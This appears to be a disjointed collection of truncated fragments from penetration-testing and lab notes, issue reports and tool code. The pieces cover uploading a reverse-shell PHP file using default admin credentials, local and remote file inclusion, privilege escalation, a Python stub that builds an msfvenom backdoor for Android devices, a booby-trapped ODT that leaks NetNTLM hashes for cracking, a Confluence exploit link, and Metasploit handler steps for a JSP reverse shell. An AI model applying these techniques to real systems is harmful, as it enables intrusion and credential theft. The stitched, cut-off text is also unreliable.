-
Keypoints:
- /site: 301 in FFUF/feroxbuster result but actually we can access it
- allow_url_fopen, allow_url_include, LFI, RFI
- [PE]replace exe under backup dir.
-
Keypoints:
- wpscan didn:t give useful info
- FFUF find /filemanager path, access with admin:admin, upload a reverse shell php file and find dora credentails info
- [PE] disk group
-
#TODO
def backdoor():
global device
if device != 'none':
if shutil.which("msfvenom") is not None:
try:
d = adbutils.adb.device(device)
…
-
Keypoints:
- Made a bad ODT file to to leak NetNTLM Creds (https://github.com/rmdavy/badodf/blob/master/badodt.py) and impacket-smbserver can receive NetHTLM hash info --> Use `hashcat -m 5600` or j…
-
Keypoints:
- Atlassian Confluence 7.13.6
--->
https://github.com/jbaines-r7/through_the_wire (https://github.com/advisories/GHSA-653m-wpjp-54c4)
- [PE]pspy64
-
## Steps to reproduce
How'd you do it?
Set up the 'sploit handler:
1. use exploit/multi/handler
2. set PAYLOAD java/jsp_shell_reverse_tcp
2. set LHOST my.host
3. set ExitOnSession false
4…
-
any suggestions on how to fix this?
-------------------------------------------------------------------------------------------------------------------------------------------------------------------…
-
## Transfer Files
Using living off the land techniques after successfully exploiting the webapp vuln. I am aware of the two flags `--file-write` and `--file-read`. But it's just nice to have in cas…
-
-
make it more like a real tty?